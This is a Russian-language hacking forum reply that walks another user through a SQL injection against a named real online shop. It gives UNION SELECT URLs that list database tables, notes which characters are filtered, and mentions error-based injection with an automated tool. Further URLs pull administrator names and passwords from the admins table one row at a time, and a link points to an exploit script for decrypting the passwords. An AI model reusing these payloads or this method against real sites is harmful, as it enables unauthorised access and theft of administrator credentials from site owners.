Показать сообщение отдельно

  #2  
Старый 17.10.2016, 01:34
qqq1457
Познающий
Регистрация: 13.10.2016
Сообщений: 33
С нами: 5043926

Репутация: 0
По умолчанию

никогда не останавливайся на скули которая не выводится,если есть рядом другая более удобная

http://www.gamepowerbazaar.com//stor...N+SELECT+1,2,3

вывод увидишь

пример:

http://www.gamepowerbazaar.com//sto...1,2,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLE S

фильтруются скобки походу ()

p.s.

.SpoilerTarget" type="button">Spoiler: или так
p.s. можно havi' ем ,то есть подставляешь все данные как на рисунке:

http://i67.tinypic.com/23wk64l.jpg

то есть получаем вывод через error base sql injection

затем уже ручками выводим логины+ пассы

http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+0, 1

1й админ

http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+1, 1

2й админ

админку не искал ,да и странные пароли админов

а вообще это "commersus shop" .они уязвимы

вот почитай как пароли расшифровать

http://downloads.securityfocus.com/v...ce_mult_exp.pl

вот.
 
Ответить с цитированием